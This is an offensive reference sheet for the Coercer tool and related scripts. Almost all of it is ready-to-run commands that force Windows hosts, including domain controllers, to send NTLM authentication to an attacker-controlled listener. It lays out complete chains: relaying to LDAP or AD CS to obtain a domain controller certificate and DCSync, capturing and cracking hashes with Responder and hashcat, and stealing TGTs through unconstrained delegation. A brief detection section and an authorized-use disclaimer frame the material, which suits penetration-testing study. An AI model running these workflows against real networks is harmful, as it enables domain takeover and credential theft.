COERCER
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Coercer is a tool to automatically coerce Windows hosts to authenticate. Exploits various RPC protocols to force NTLM authentication.
INSTALLATION#
pip install coercer # Or from source git clone https://github.com/p0dalirius/Coercer cd Coercer pip install -r requirements.txt
BASIC USAGE#
SCAN FOR VULNERABLE METHODS#
# Scan target for coercible methods coercer scan -t TARGET -u user -p 'password' -d DOMAIN # Scan range coercer scan -t 192.168.1.0/24 -u user -p 'password' -d DOMAIN
COERCE AUTHENTICATION#
# Coerce target to authenticate to listener coercer coerce -t TARGET -l LISTENER -u user -p 'password' -d DOMAIN # Specific method coercer coerce -t TARGET -l LISTENER -u user -p pass -d DOMAIN --filter-method-name EfsRpcOpenFileRaw # All available methods coercer coerce -t TARGET -l LISTENER -u user -p pass -d DOMAIN --always-continue
AUTHENTICATION OPTIONS#
PASSWORD#
coercer coerce -t TARGET -l LISTENER -u user -p 'password' -d DOMAIN
HASH#
coercer coerce -t TARGET -l LISTENER -u user -H 'NTHASH' -d DOMAIN
KERBEROS#
export KRB5CCNAME=ticket.ccache coercer coerce -t TARGET -l LISTENER -u user -k -d DOMAIN
NULL SESSION#
coercer coerce -t TARGET -l LISTENER --no-auth
COERCION METHODS#
MS-EFSR (PetitPotam)#
# EFS Remote Protocol # Methods: EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv, etc. coercer coerce -t DC -l LISTENER -u user -p pass -d DOMAIN --filter-protocol-name MS-EFSR
MS-RPRN (PrinterBug)#
# Print System Remote Protocol # Method: RpcRemoteFindFirstPrinterChangeNotification coercer coerce -t DC -l LISTENER -u user -p pass -d DOMAIN --filter-protocol-name MS-RPRN
MS-FSRVP (ShadowCoerce)#
# File Server Remote VSS Protocol coercer coerce -t TARGET -l LISTENER -u user -p pass -d DOMAIN --filter-protocol-name MS-FSRVP
MS-DFSNM (DFSCoerce)#
# Distributed File System Namespace Management coercer coerce -t DC -l LISTENER -u user -p pass -d DOMAIN --filter-protocol-name MS-DFSNM
MS-EVEN (EventLog)#
# EventLog Remoting Protocol coercer coerce -t TARGET -l LISTENER -u user -p pass -d DOMAIN --filter-protocol-name MS-EVEN
FILTERING#
BY PROTOCOL#
coercer coerce -t TARGET -l LISTENER -u user -p pass -d DOMAIN --filter-protocol-name MS-EFSR
BY METHOD#
coercer coerce -t TARGET -l LISTENER -u user -p pass -d DOMAIN --filter-method-name EfsRpcOpenFileRaw
BY TRANSPORT#
# SMB only coercer coerce -t TARGET -l LISTENER -u user -p pass -d DOMAIN --filter-transport smb # HTTP only coercer coerce -t TARGET -l LISTENER -u user -p pass -d DOMAIN --filter-transport http
LIST OPTIONS#
# List all protocols coercer list --protocols # List all methods coercer list --methods # List methods for protocol coercer list --methods --filter-protocol-name MS-EFSR
ATTACK WORKFLOWS#
NTLM RELAY TO LDAP#
# 1. Start ntlmrelayx ntlmrelayx.py -t ldap://DC -smb2support # 2. Coerce DC to authenticate coercer coerce -t DC -l ATTACKER -u user -p pass -d DOMAIN # 3. Result: Add computer account, modify ACLs, etc.
NTLM RELAY TO AD CS#
# 1. Start ntlmrelayx ntlmrelayx.py -t http://CA/certsrv/certfnsh.asp -smb2support --adcs --template DomainController # 2. Coerce DC coercer coerce -t DC -l ATTACKER -u user -p pass -d DOMAIN --filter-protocol-name MS-EFSR # 3. Get DC certificate -> DCSync
CAPTURE HASH#
# 1. Start Responder sudo responder -I eth0 # 2. Coerce target coercer coerce -t TARGET -l ATTACKER -u user -p pass -d DOMAIN # 3. Crack captured hash hashcat -m 5600 hash.txt wordlist.txt
UNCONSTRAINED DELEGATION#
# 1. Monitor on unconstrained host Rubeus.exe monitor /filteruser:DC$ /interval:5 # 2. Coerce DC coercer coerce -t DC -l UNCONSTRAINED_HOST -u user -p pass -d DOMAIN # 3. Capture and use TGT
WEBDAV COERCION#
# HTTP-based coercion (useful when SMB blocked) # 1. Start WebDAV on attacker # (WebDAV redirector triggers NTLM over HTTP) # 2. Use HTTP coercion coercer coerce -t TARGET -l ATTACKER@80 -u user -p pass -d DOMAIN --filter-transport http
SCANNING NETWORK#
# Find vulnerable hosts coercer scan -t 192.168.1.0/24 -u user -p pass -d DOMAIN # Output to file coercer scan -t 192.168.1.0/24 -u user -p pass -d DOMAIN -o results.json # Specific protocol coercer scan -t 192.168.1.0/24 -u user -p pass -d DOMAIN --filter-protocol-name MS-EFSR
INDIVIDUAL TOOLS#
PETITPOTAM (Standalone)#
# If Coercer unavailable python3 PetitPotam.py -d DOMAIN -u user -p pass LISTENER TARGET # Unauthenticated (patched on most) python3 PetitPotam.py LISTENER TARGET
PRINTERBUG (Standalone)#
python3 printerbug.py DOMAIN/user:password@TARGET LISTENER
DFSCOERCE (Standalone)#
python3 dfscoerce.py -d DOMAIN -u user -p pass LISTENER TARGET
DEFENSE DETECTION#
# These attacks trigger: # - NTLM authentication events # - RPC connection logs # - Certificate requests (ADCS relay) # - Account modifications (LDAP relay) # Monitor for: # - Event ID 4624 (Logon) # - Event ID 5156 (RPC connections) # - Unusual machine account activity
QUICK REFERENCE#
coercer scan -t TARGET -u user -p pass -d DOMAIN # Scan for methods coercer coerce -t TARGET -l LISTENER -u user -p pass # Coerce auth coercer coerce -t TARGET -l LISTENER --filter-protocol-name MS-EFSR # PetitPotam coercer coerce -t TARGET -l LISTENER --filter-protocol-name MS-RPRN # PrinterBug coercer coerce -t TARGET -l LISTENER --always-continue # Try all methods coercer list --protocols # List protocols coercer list --methods # List methods